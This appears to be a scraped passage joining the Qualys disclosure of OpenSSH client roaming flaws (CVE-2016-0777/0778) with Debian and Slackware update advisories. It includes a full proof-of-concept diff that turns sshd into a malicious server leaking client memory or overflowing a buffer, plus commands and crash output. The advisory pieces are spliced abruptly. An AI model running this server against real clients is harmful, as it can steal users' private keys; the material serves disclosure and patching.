\u003c 0 || pipe(pout) \u003c 0)\n 193 fatal(\"Could not create pipes to communicate with the proxy: %.100s\",\n 194 strerror(errno));\n ... \n 240 /* Close child side of the descriptors. */\n 241 close(pin[0]);\n 242 close(pout[1]);\n ... \n 247 /* Set the connection file descriptors. */\n 248 packet_set_connection(pout[0], pin[1]);\n 249\n 250 /* Indicate OK return */\n 251 return 0;\n 252 }\n\nIn wait_for_roaming_reconnect(), the two old, low-numbered file\ndescriptors connection_in and connection_out are both close()d by\npacket_backup_state(), and immediately reused for the pipe(pin) in\nssh_proxy_connect(): the new connection_out (pin[1]) is equal to one of\nthese old, low-numbered file descriptors, and cannot possibly overflow\nsetp. \n\nOn the other hand, the pipe(pout) in ssh_proxy_connect() may return\nhigh-numbered file descriptors, and the new connection_in (pout[0]) may\ntherefore overflow setp, if hundreds of file descriptors were leaked\nbefore the call to wait_for_roaming_reconnect():\n\n- We discovered a file descriptor leak in the pubkey_prepare() function\n of OpenSSH \u003e= 6.8; indeed, if the client is running an authentication\n agent that does not offer any private keys, the reference to agent_fd\n is lost, and this file descriptor is never close()d:\n\n1194 static void\n1195 pubkey_prepare(Authctxt *authctxt)\n1196 {\n.... \n1200 int agent_fd, i, r, found;\n.... \n1247 if ((r = ssh_get_authentication_socket(\u0026agent_fd)) != 0) {\n1248 if (r != SSH_ERR_AGENT_NOT_PRESENT)\n1249 debug(\"%s: ssh_get_authentication_socket: %s\",\n1250 __func__, ssh_err(r));\n1251 } else if ((r = ssh_fetch_identitylist(agent_fd, 2, \u0026idlist)) != 0) {\n1252 if (r != SSH_ERR_AGENT_NO_IDENTITIES)\n1253 debug(\"%s: ssh_fetch_identitylist: %s\",\n1254 __func__, ssh_err(r));\n1255 } else {\n.... \n1288 authctxt-\u003eagent_fd = agent_fd;\n1289 }\n.... \n1299 }\n\n However, OpenSSH clients \u003e= 6.8 crash in ssh_packet_restore_state()\n (because of the NULL-pointer dereference discussed in the Mitigating\n Factors of the Buffer Overflow section) and are immune to the setp\n overflow, despite this agent_fd leak. \n\n- If ForwardAgent (-A) or ForwardX11 (-X) is enabled in the OpenSSH\n client (it is disabled by default), a malicious SSH server can request\n hundreds of forwardings, in order to increase connection_in (each\n forwarding opens a file descriptor), and thus overflow setp in\n packet_read_seqnr():\n\n# env ROAMING=\"overflow:A\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -V\nOpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014\n\n$ /usr/bin/ssh-agent -- /usr/bin/ssh -A -o ProxyCommand=\"/usr/bin/socat - TCP4:%h:%p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n*** Error in `/usr/bin/ssh\u0027: free(): invalid next size (fast): 0x00007f0474d03e70 ***\nAborted (core dumped)\n\n# env ROAMING=\"overflow:X\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ /usr/bin/ssh -X -o ProxyCommand=\"/usr/bin/socat - TCP4:%h:%p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n*** Error in `/usr/bin/ssh\u0027: free(): invalid next size (fast): 0x00007fdcc2a3aba0 ***\n*** Error in `/usr/bin/ssh\u0027: malloc(): memory corruption: 0x00007fdcc2a3abc0 ***\n\nFinally, a brief digression on two unexpected problems that had to be\nsolved in our proof-of-concept:\n\n- First, setp can be overflowed only in packet_read_seqnr(), not in\n packet_write_wait(), but agent forwarding and X11 forwarding are post-\n authentication functionalities, and post-authentication calls to\n packet_read() or packet_read_expect() are scarce, except in the\n key-exchange code of OpenSSH clients \u003c 6.8: our proof-of-concept\n effectively forces a rekeying in order to overflow setp in\n packet_read_seqnr(). \n\n- Second, after a successful reconnection, packet_read_seqnr() may call\n fatal(\"Read from socket failed: %.100s\", ...), because roaming_read()\n may return EAGAIN (EAGAIN is never returned without the reconnection,\n because the preceding call to select() guarantees that connection_in\n is ready for read()). Our proof-of-concept works around this problem\n by forcing the client to resend MAX_ROAMBUF bytes (2M) to the server,\n allowing data to reach the client before roaming_read() is called,\n thus avoiding EAGAIN. \n\n\n========================================================================\nAcknowledgments\n========================================================================\n\nWe would like to thank the OpenSSH developers for their great work and\ntheir incredibly quick response, Red Hat Product Security for promptly\nassigning CVE-IDs to these issues, and Alexander Peslyak of the Openwall\nProject for the interesting discussions. \n\n\n========================================================================\nProof Of Concept\n========================================================================\n\ndiff -pruN openssh-6.4p1/auth2-pubkey.c openssh-6.4p1+roaming/auth2-pubkey.c\n--- openssh-6.4p1/auth2-pubkey.c\t2013-07-17 23:10:10.000000000 -0700\n+++ openssh-6.4p1+roaming/auth2-pubkey.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -169,7 +169,9 @@ userauth_pubkey(Authctxt *authctxt)\n \t\t * if a user is not allowed to login. is this an\n \t\t * issue? -markus\n \t\t */\n-\t\tif (PRIVSEP(user_key_allowed(authctxt-\u003epw, key))) {\n+\t\tif (PRIVSEP(user_key_allowed(authctxt-\u003epw, key)) || 1) {\n+\t\t\tdebug(\"%s: force client-side load_identity_file\",\n+\t\t\t __func__);\n \t\t\tpacket_start(SSH2_MSG_USERAUTH_PK_OK);\n \t\t\tpacket_put_string(pkalg, alen);\n \t\t\tpacket_put_string(pkblob, blen);\ndiff -pruN openssh-6.4p1/kex.c openssh-6.4p1+roaming/kex.c\n--- openssh-6.4p1/kex.c\t2013-06-01 14:31:18.000000000 -0700\n+++ openssh-6.4p1+roaming/kex.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -442,6 +442,73 @@ proposals_match(char *my[PROPOSAL_MAX],\n }\n \n static void\n+roaming_reconnect(void)\n+{\n+\tpacket_read_expect(SSH2_MSG_KEX_ROAMING_RESUME);\n+\tconst u_int id = packet_get_int(); /* roaming_id */\n+\tdebug(\"%s: id %u\", __func__, id);\n+\tpacket_check_eom();\n+\n+\tconst char *const dir = get_roaming_dir(id);\n+\tdebug(\"%s: dir %s\", __func__, dir);\n+\tconst int fd = open(dir, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);\n+\tif (fd \u003c= -1)\n+\t\tfatal(\"%s: open %s errno %d\", __func__, dir, errno);\n+\tif (fchdir(fd) != 0)\n+\t\tfatal(\"%s: fchdir %s errno %d\", __func__, dir, errno);\n+\tif (close(fd) != 0)\n+\t\tfatal(\"%s: close %s errno %d\", __func__, dir, errno);\n+\n+\tpacket_start(SSH2_MSG_KEX_ROAMING_AUTH_REQUIRED);\n+\tpacket_put_int64(arc4random()); /* chall */\n+\tpacket_put_int64(arc4random()); /* oldchall */\n+\tpacket_send();\n+\n+\tpacket_read_expect(SSH2_MSG_KEX_ROAMING_AUTH);\n+\tconst u_int64_t client_read_bytes = packet_get_int64();\n+\tdebug(\"%s: client_read_bytes %llu\", __func__,\n+\t (unsigned long long)client_read_bytes);\n+\tpacket_get_int64(); /* digest (1-8) */\n+\tpacket_get_int64(); /* digest (9-16) */\n+\tpacket_get_int(); /* digest (17-20) */\n+\tpacket_check_eom();\n+\n+\tu_int64_t client_write_bytes;\n+\tsize_t len = sizeof(client_write_bytes);\n+\tload_roaming_file(\"client_write_bytes\", \u0026client_write_bytes, \u0026len);\n+\tdebug(\"%s: client_write_bytes %llu\", __func__,\n+\t (unsigned long long)client_write_bytes);\n+\n+\tu_int client_out_buf_size;\n+\tlen = sizeof(client_out_buf_size);\n+\tload_roaming_file(\"client_out_buf_size\", \u0026client_out_buf_size, \u0026len);\n+\tdebug(\"%s: client_out_buf_size %u\", __func__, client_out_buf_size);\n+\tif (client_out_buf_size \u003c= 0 || client_out_buf_size \u003e MAX_ROAMBUF)\n+\t\tfatal(\"%s: client_out_buf_size %u\", __func__,\n+\t\t\t client_out_buf_size);\n+\n+\tpacket_start(SSH2_MSG_KEX_ROAMING_AUTH_OK);\n+\tpacket_put_int64(client_write_bytes - (u_int64_t)client_out_buf_size);\n+\tpacket_send();\n+\tconst int overflow = (access(\"output\", F_OK) == 0);\n+\tif (overflow != 0) {\n+\t\tconst void *const ptr = load_roaming_file(\"output\", NULL, \u0026len);\n+\t\tbuffer_append(packet_get_output(), ptr, len);\n+\t}\n+\tpacket_write_wait();\n+\n+\tchar *const client_out_buf = xmalloc(client_out_buf_size);\n+\tif (atomicio(read, packet_get_connection_in(), client_out_buf,\n+\t\t\t client_out_buf_size) != client_out_buf_size)\n+\t\tfatal(\"%s: read client_out_buf_size %u errno %d\", __func__,\n+\t\t\t\tclient_out_buf_size, errno);\n+\tif (overflow == 0)\n+\t\tdump_roaming_file(\"infoleak\", client_out_buf,\n+\t\t\t\t\t client_out_buf_size);\n+\tfatal(\"%s: all done for %s\", __func__, dir);\n+}\n+\n+static void\n kex_choose_conf(Kex *kex)\n {\n \tNewkeys *newkeys;\n@@ -470,6 +537,10 @@ kex_choose_conf(Kex *kex)\n \t\t\tkex-\u003eroaming = 1;\n \t\t\tfree(roaming);\n \t\t}\n+\t} else if (strcmp(peer[PROPOSAL_KEX_ALGS], KEX_RESUME) == 0) {\n+\t\troaming_reconnect();\n+\t\t/* NOTREACHED */\n+\t\tfatal(\"%s: returned from %s\", __func__, KEX_RESUME);\n \t}\n \n \t/* Algorithm Negotiation */\ndiff -pruN openssh-6.4p1/roaming.h openssh-6.4p1+roaming/roaming.h\n--- openssh-6.4p1/roaming.h\t2011-12-18 15:52:52.000000000 -0800\n+++ openssh-6.4p1+roaming/roaming.h\t2016-01-07 01:04:15.000000000 -0800\n@@ -42,4 +42,86 @@ void\tresend_bytes(int, u_int64_t *);\n void\tcalculate_new_key(u_int64_t *, u_int64_t, u_int64_t);\n int\tresume_kex(void);\n \n+#include \u003cfcntl.h\u003e\n+#include \u003cstdio.h\u003e\n+#include \u003cstring.h\u003e\n+#include \u003csys/stat.h\u003e\n+#include \u003csys/types.h\u003e\n+#include \u003cunistd.h\u003e\n+\n+#include \"atomicio.h\"\n+#include \"log.h\"\n+#include \"xmalloc.h\"\n+\n+static inline char *\n+get_roaming_dir(const u_int id)\n+{\n+\tconst size_t buflen = MAXPATHLEN;\n+\tchar *const buf = xmalloc(buflen);\n+\n+\tif ((u_int)snprintf(buf, buflen, \"/tmp/roaming-%08x\", id) \u003e= buflen)\n+\t\tfatal(\"%s: snprintf %u error\", __func__, id);\n+\treturn buf;\n+}\n+\n+static inline void\n+dump_roaming_file(const char *const name,\n+ const void *const buf, const size_t buflen)\n+{\n+\tif (name == NULL)\n+\t\tfatal(\"%s: name %p\", __func__, name);\n+\tif (strchr(name, \u0027/\u0027) != NULL)\n+\t\tfatal(\"%s: name %s\", __func__, name);\n+\tif (buf == NULL)\n+\t\tfatal(\"%s: %s buf %p\", __func__, name, buf);\n+\tif (buflen \u003c= 0 || buflen \u003e MAX_ROAMBUF)\n+\t\tfatal(\"%s: %s buflen %lu\", __func__, name, (u_long)buflen);\n+\n+\tconst int fd = open(name, O_WRONLY | O_CREAT | O_EXCL, S_IRUSR);\n+\tif (fd \u003c= -1)\n+\t\tfatal(\"%s: open %s errno %d\", __func__, name, errno);\n+\tif (write(fd, buf, buflen) != (ssize_t)buflen)\n+\t\tfatal(\"%s: write %s errno %d\", __func__, name, errno);\n+\tif (close(fd) != 0)\n+\t\tfatal(\"%s: close %s errno %d\", __func__, name, errno);\n+}\n+\n+static inline void *\n+load_roaming_file(const char *const name,\n+ void *buf, size_t *const buflenp)\n+{\n+\tif (name == NULL)\n+\t\tfatal(\"%s: name %p\", __func__, name);\n+\tif (strchr(name, \u0027/\u0027) != NULL)\n+\t\tfatal(\"%s: name %s\", __func__, name);\n+\tif (buflenp == NULL)\n+\t\tfatal(\"%s: %s buflenp %p\", __func__, name, buflenp);\n+\n+\tconst int fd = open(name, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);\n+\tif (fd \u003c= -1)\n+\t\tfatal(\"%s: open %s errno %d\", __func__, name, errno);\n+\tstruct stat st;\n+\tif (fstat(fd, \u0026st) != 0)\n+\t\tfatal(\"%s: fstat %s errno %d\", __func__, name, errno);\n+\tif (S_ISREG(st.st_mode) == 0)\n+\t\tfatal(\"%s: %s mode 0%o\", __func__, name, (u_int)st.st_mode);\n+\tif (st.st_size \u003c= 0 || st.st_size \u003e MAX_ROAMBUF)\n+\t\tfatal(\"%s: %s size %lld\", __func__, name,\n+\t\t (long long)st.st_size);\n+\n+\tif (buf == NULL) {\n+\t\t*buflenp = st.st_size;\n+\t\tbuf = xmalloc(*buflenp);\n+\t} else {\n+\t\tif (*buflenp != (size_t)st.st_size)\n+\t\t\tfatal(\"%s: %s size %lld buflen %lu\", __func__, name,\n+\t\t\t (long long)st.st_size, (u_long)*buflenp);\n+\t}\n+\tif (read(fd, buf, *buflenp) != (ssize_t)*buflenp)\n+\t\tfatal(\"%s: read %s errno %d\", __func__, name, errno);\n+\tif (close(fd) != 0)\n+\t\tfatal(\"%s: close %s errno %d\", __func__, name, errno);\n+\treturn buf;\n+}\n+\n #endif /* ROAMING */\ndiff -pruN openssh-6.4p1/serverloop.c openssh-6.4p1+roaming/serverloop.c\n--- openssh-6.4p1/serverloop.c\t2013-07-17 23:12:45.000000000 -0700\n+++ openssh-6.4p1+roaming/serverloop.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -1060,6 +1060,9 @@ server_request_session(void)\n \treturn c;\n }\n \n+static int client_session_channel = -1;\n+static int server_session_channel = -1;\n+\n static void\n server_input_channel_open(int type, u_int32_t seq, void *ctxt)\n {\n@@ -1089,12 +1092,22 @@ server_input_channel_open(int type, u_in\n \t\tc-\u003eremote_window = rwindow;\n \t\tc-\u003eremote_maxpacket = rmaxpack;\n \t\tif (c-\u003etype != SSH_CHANNEL_CONNECTING) {\n+\t\t\tdebug(\"%s: avoid client-side buf_append\", __func__);\n+\t\t\t/*\n \t\t\tpacket_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);\n \t\t\tpacket_put_int(c-\u003eremote_id);\n \t\t\tpacket_put_int(c-\u003eself);\n \t\t\tpacket_put_int(c-\u003elocal_window);\n \t\t\tpacket_put_int(c-\u003elocal_maxpacket);\n \t\t\tpacket_send();\n+\t\t\t*/\n+\t\t\tif (strcmp(ctype, \"session\") == 0) {\n+\t\t\t\tif (client_session_channel != -1)\n+\t\t\t\t\tfatal(\"%s: client_session_channel %d\",\n+\t\t\t\t\t __func__, client_session_channel);\n+\t\t\t\tclient_session_channel = c-\u003eremote_id;\n+\t\t\t\tserver_session_channel = c-\u003eself;\n+\t\t\t}\n \t\t}\n \t} else {\n \t\tdebug(\"server_input_channel_open: failure %s\", ctype);\n@@ -1111,6 +1124,196 @@ server_input_channel_open(int type, u_in\n }\n \n static void\n+roaming_disconnect(Kex *const kex)\n+{\n+\tconst char *cp, *roaming = getenv(\"ROAMING\");\n+\tif (roaming == NULL)\n+\t\troaming = \"infoleak\";\n+\tint overflow = 0;\n+\tif ((cp = strstr(roaming, \"overflow:\")) != NULL)\n+\t\toverflow = cp[9];\n+\n+\tconst u_int client_recv_buf_size = packet_get_int();\n+\tpacket_check_eom();\n+\tconst u_int server_recv_buf_size = get_recv_buf_size();\n+\tconst u_int server_send_buf_size = get_snd_buf_size();\n+\tdebug(\"%s: client_recv_buf_size %u\", __func__, client_recv_buf_size);\n+\tdebug(\"%s: server_recv_buf_size %u\", __func__, server_recv_buf_size);\n+\tdebug(\"%s: server_send_buf_size %u\", __func__, server_send_buf_size);\n+\n+\tu_int client_send_buf_size = 0;\n+\tif ((cp = strstr(roaming, \"client_send_buf_size:\")) != NULL)\n+\t\tclient_send_buf_size = strtoul(cp + 21, NULL, 0);\n+\telse if (client_recv_buf_size == DEFAULT_ROAMBUF)\n+\t\tclient_send_buf_size = DEFAULT_ROAMBUF;\n+\telse {\n+\t\tconst u_int\n+\t\t max = MAX(client_recv_buf_size, server_recv_buf_size),\n+\t\t min = MIN(client_recv_buf_size, server_recv_buf_size);\n+\t\tif (min \u003c= 0)\n+\t\t\tfatal(\"%s: min %u\", __func__, min);\n+\t\tif (((u_int64_t)(max - min) * 1024) / min \u003c 1)\n+\t\t\tclient_send_buf_size = server_send_buf_size;\n+\t\telse\n+\t\t\tclient_send_buf_size = client_recv_buf_size;\n+\t}\n+\tdebug(\"%s: client_send_buf_size %u\", __func__, client_send_buf_size);\n+\tif (client_send_buf_size \u003c= 0)\n+\t\tfatal(\"%s: client_send_buf_size\", __func__);\n+\n+\tu_int id = 0;\n+\tchar *dir = NULL;\n+\tfor (;;) {\n+\t\tid = arc4random();\n+\t\tdebug(\"%s: id %u\", __func__, id);\n+\t\tfree(dir);\n+\t\tdir = get_roaming_dir(id);\n+\t\tif (mkdir(dir, S_IRWXU) == 0)\n+\t\t\tbreak;\n+\t\tif (errno != EEXIST)\n+\t\t\tfatal(\"%s: mkdir %s errno %d\", __func__, dir, errno);\n+\t}\n+\tdebug(\"%s: dir %s\", __func__, dir);\n+\tif (chdir(dir) != 0)\n+\t\tfatal(\"%s: chdir %s errno %d\", __func__, dir, errno);\n+\n+\tu_int client_out_buf_size = 0;\n+\tif ((cp = strstr(roaming, \"client_out_buf_size:\")) != NULL)\n+\t\tclient_out_buf_size = strtoul(cp + 20, NULL, 0);\n+\telse if (overflow != 0)\n+\t\tclient_out_buf_size = MAX_ROAMBUF;\n+\telse\n+\t\tclient_out_buf_size = 1 + arc4random() % 4096;\n+\tdebug(\"%s: client_out_buf_size %u\", __func__, client_out_buf_size);\n+\tif (client_out_buf_size \u003c= 0)\n+\t\tfatal(\"%s: client_out_buf_size\", __func__);\n+\tdump_roaming_file(\"client_out_buf_size\", \u0026client_out_buf_size,\n+\t\t\t\t\t sizeof(client_out_buf_size));\n+\n+\tif ((cp = strstr(roaming, \"scp_mode\")) != NULL) {\n+\t\tif (overflow != 0)\n+\t\t\tfatal(\"%s: scp_mode is incompatible with overflow %d\",\n+\t\t\t __func__, overflow);\n+\n+\t\tu_int seconds_left_to_sleep = 3;\n+\t\tif ((cp = strstr(cp, \"sleep:\")) != NULL)\n+\t\t\tseconds_left_to_sleep = strtoul(cp + 6, NULL, 0);\n+\t\tdebug(\"%s: sleep %u\", __func__, seconds_left_to_sleep);\n+\n+\t\tif (client_session_channel == -1)\n+\t\t\tfatal(\"%s: client_session_channel %d\",\n+\t\t\t __func__, client_session_channel);\n+\n+\t\tpacket_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);\n+\t\tpacket_put_int(client_session_channel);\n+\t\tpacket_put_int(server_session_channel);\n+\t\tpacket_put_int(0); /* server window */\n+\t\tpacket_put_int(0); /* server maxpacket */\n+\t\tpacket_send();\n+\n+\t\tpacket_start(SSH2_MSG_CHANNEL_DATA);\n+\t\tpacket_put_int(client_session_channel);\n+\t\tpacket_put_string(\"\\0\\n\", 2); /* response\u0026source|sink\u0026run_err */\n+\t\tpacket_send();\n+\n+\t\tpacket_read_expect(SSH2_MSG_CHANNEL_REQUEST);\n+\t\tpacket_get_int(); /* server channel */\n+\t\tdebug(\"%s: channel request %s\", __func__,\n+\t\t packet_get_cstring(NULL));\n+\n+\t\twhile (seconds_left_to_sleep)\n+\t\t\tseconds_left_to_sleep = sleep(seconds_left_to_sleep);\n+\t}\n+\n+\tpacket_start(SSH2_MSG_REQUEST_SUCCESS);\n+\tpacket_put_int(id); /* roaming_id */\n+\tpacket_put_int64(arc4random()); /* cookie */\n+\tpacket_put_int64(0); /* key1 */\n+\tpacket_put_int64(0); /* key2 */\n+\tpacket_put_int(client_out_buf_size - client_send_buf_size);\n+\tpacket_send();\n+\tpacket_write_wait();\n+\n+\tif (overflow != 0) {\n+\t\tconst u_int64_t full_client_out_buf = get_recv_bytes() +\n+\t\t\t\t client_out_buf_size;\n+\n+\t\tu_int fd_leaks = 4 * 8 * 8; /* MIN_CHUNK_SIZE in bits */\n+\t\tif ((cp = strstr(roaming, \"fd_leaks:\")) != NULL)\n+\t\t\tfd_leaks = strtoul(cp + 9, NULL, 0);\n+\t\tdebug(\"%s: fd_leaks %u\", __func__, fd_leaks);\n+\n+\t\twhile (fd_leaks--) {\n+\t\t\tpacket_start(SSH2_MSG_CHANNEL_OPEN);\n+\t\t\tpacket_put_cstring(overflow == \u0027X\u0027 ? \"x11\" :\n+\t\t\t \"auth-agent@openssh.com\"); /* ctype */\n+\t\t\tpacket_put_int(arc4random()); /* server channel */\n+\t\t\tpacket_put_int(arc4random()); /* server window */\n+\t\t\tpacket_put_int(arc4random()); /* server maxpacket */\n+\t\t\tif (overflow == \u0027X\u0027) {\n+\t\t\t\tpacket_put_cstring(\"\"); /* originator */\n+\t\t\t\tpacket_put_int(arc4random()); /* port */\n+\t\t\t}\n+\t\t\tpacket_send();\n+\n+\t\t\tpacket_read_expect(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);\n+\t\t\tpacket_get_int(); /* server channel */\n+\t\t\tpacket_get_int(); /* client channel */\n+\t\t\tpacket_get_int(); /* client window */\n+\t\t\tpacket_get_int(); /* client maxpacket */\n+\t\t\tpacket_check_eom();\n+\t\t}\n+\n+\t\twhile (get_recv_bytes() \u003c= full_client_out_buf) {\n+\t\t\tpacket_start(SSH2_MSG_GLOBAL_REQUEST);\n+\t\t\tpacket_put_cstring(\"\"); /* rtype */\n+\t\t\tpacket_put_char(1); /* want_reply */\n+\t\t\tpacket_send();\n+\n+\t\t\tpacket_read_expect(SSH2_MSG_REQUEST_FAILURE);\n+\t\t\tpacket_check_eom();\n+\t\t}\n+\n+\t\tif (kex == NULL)\n+\t\t\tfatal(\"%s: no kex, cannot rekey\", __func__);\n+\t\tif (kex-\u003eflags \u0026 KEX_INIT_SENT)\n+\t\t\tfatal(\"%s: KEX_INIT_SENT already\", __func__);\n+\t\tchar *const ptr = buffer_ptr(\u0026kex-\u003emy);\n+\t\tconst u_int len = buffer_len(\u0026kex-\u003emy);\n+\t\tif (len \u003c= 1+4) /* first_kex_follows + reserved */\n+\t\t\tfatal(\"%s: kex len %u\", __func__, len);\n+\t\tptr[len - (1+4)] = 1; /* first_kex_follows */\n+\t\tkex_send_kexinit(kex);\n+\n+\t\tu_int i;\n+\t\tpacket_read_expect(SSH2_MSG_KEXINIT);\n+\t\tfor (i = 0; i \u003c KEX_COOKIE_LEN; i++)\n+\t\t\tpacket_get_char();\n+\t\tfor (i = 0; i \u003c PROPOSAL_MAX; i++)\n+\t\t\tfree(packet_get_string(NULL));\n+\t\tpacket_get_char(); /* first_kex_follows */\n+\t\tpacket_get_int(); /* reserved */\n+\t\tpacket_check_eom();\n+\n+\t\tchar buf[8192*2]; /* two packet_read_seqnr bufferfuls */\n+\t\tmemset(buf, \u0027\\0\u0027, sizeof(buf));\n+\t\tpacket_start(SSH2_MSG_KEX_ROAMING_AUTH_FAIL);\n+\t\tpacket_put_string(buf, sizeof(buf));\n+\t\tpacket_send();\n+\t\tconst Buffer *const output = packet_get_output();\n+\t\tdump_roaming_file(\"output\", buffer_ptr(output),\n+\t\t\t\t\t buffer_len(output));\n+\t}\n+\n+\tconst u_int64_t client_write_bytes = get_recv_bytes();\n+\tdebug(\"%s: client_write_bytes %llu\", __func__,\n+\t (unsigned long long)client_write_bytes);\n+\tdump_roaming_file(\"client_write_bytes\", \u0026client_write_bytes,\n+\t\t\t\t\t sizeof(client_write_bytes));\n+\tfatal(\"%s: all done for %s\", __func__, dir);\n+}\n+\n+static void\n server_input_global_request(int type, u_int32_t seq, void *ctxt)\n {\n \tchar *rtype;\n@@ -1168,6 +1371,13 @@ server_input_global_request(int type, u_\n \t} else if (strcmp(rtype, \"no-more-sessions@openssh.com\") == 0) {\n \t\tno_more_sessions = 1;\n \t\tsuccess = 1;\n+\t} else if (strcmp(rtype, ROAMING_REQUEST) == 0) {\n+\t\tif (want_reply != 1)\n+\t\t\tfatal(\"%s: rtype %s want_reply %d\", __func__,\n+\t\t\t\t rtype, want_reply);\n+\t\troaming_disconnect(ctxt);\n+\t\t/* NOTREACHED */\n+\t\tfatal(\"%s: returned from %s\", __func__, ROAMING_REQUEST);\n \t}\n \tif (want_reply) {\n \t\tpacket_start(success ?\ndiff -pruN openssh-6.4p1/sshd.c openssh-6.4p1+roaming/sshd.c\n--- openssh-6.4p1/sshd.c\t2013-07-19 20:21:53.000000000 -0700\n+++ openssh-6.4p1+roaming/sshd.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -2432,6 +2432,8 @@ do_ssh2_kex(void)\n \t}\n \tif (options.kex_algorithms != NULL)\n \t\tmyproposal[PROPOSAL_KEX_ALGS] = options.kex_algorithms;\n+\telse\n+\t\tmyproposal[PROPOSAL_KEX_ALGS] = KEX_DEFAULT_KEX \",\" KEX_RESUME;\n \n \tif (options.rekey_limit || options.rekey_interval)\n \t\tpacket_set_rekey_limits((u_int32_t)options.rekey_limit,\n. \n\nUsers with passphrase-less privates keys, especially in non interactive\nsetups (automated jobs using ssh, scp, rsync+ssh etc.) are advised to\nupdate their keys if they have connected to an SSH server they don\u0027t\ntrust. \n\nMore details about identifying an attack and mitigations will be\navailable in the Qualys Security Advisory. \n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 1:6.0p1-4+deb7u3. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1:6.7p1-5+deb8u1. \n\nFor the testing distribution (stretch) and unstable distribution (sid), these\nproblems will be fixed in a later version. \n\nWe recommend that you upgrade your openssh packages. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n[slackware-security] openssh (SSA:2016-014-01)\n\nNew openssh packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix security issues. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssh-7.1p2-i486-1_slack14.1.txz: Upgraded. \n This update fixes an information leak and a buffer overflow. \n For more information, see:\n https://www.qualys.com/2016/01/14/cve-2016-0777-cve-2016-0778/openssh-cve-2016-0777-cve-2016-0778.txt\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0777\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0778\n *****************************************************************\n * IMPORTANT: READ BELOW ABOUT POTENTIALLY INCOMPATIBLE CHANGES *\n *****************************************************************\n Rather than backport the fix for the information leak (which is the only\n hazardous flaw), we have upgraded to the latest OpenSSH. As of version\n 7.0, OpenSSH has deprecated some older (and presumably less secure)\n algorithms, and also (by default) only allows root login by public-key,\n hostbased and GSSAPI authentication. Make sure that your keys and\n authentication method will allow you to continue accessing your system\n after the upgrade. \n The release notes for OpenSSH 7.0 list the following incompatible changes\n to be aware of:\n * Support for the legacy SSH version 1 protocol is disabled by\n default at compile time. \n * Support for the 1024-bit diffie-hellman-group1-sha1 key exchange\n is disabled by default at run-time. It may be re-enabled using\n the instructions at http://www.openssh.com/legacy.html\n * Support for ssh-dss, ssh-dss-cert-* host and user keys is disabled\n by default at run-time. These may be re-enabled using the\n instructions at http://www.openssh.com/legacy.html\n * Support for the legacy v00 cert format has been removed. \n * The default for the sshd_config(5) PermitRootLogin option has\n changed from \"yes\" to \"prohibit-password\". \n * PermitRootLogin=without-password/prohibit-password now bans all\n interactive authentication methods, allowing only public-key,\n hostbased and GSSAPI authentication (previously it permitted\n keyboard-interactive and password-less authentication if those\n were enabled). \n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssh-7.1p2-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssh-7.1p2-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssh-7.1p2-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssh-7.1p2-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssh-7.1p2-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssh-7.1p2-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssh-7.1p2-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssh-7.1p2-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssh-7.1p2-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssh-7.1p2-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssh-7.1p2-i586-1.txz\n\nUpdated package for Slackware x86_64 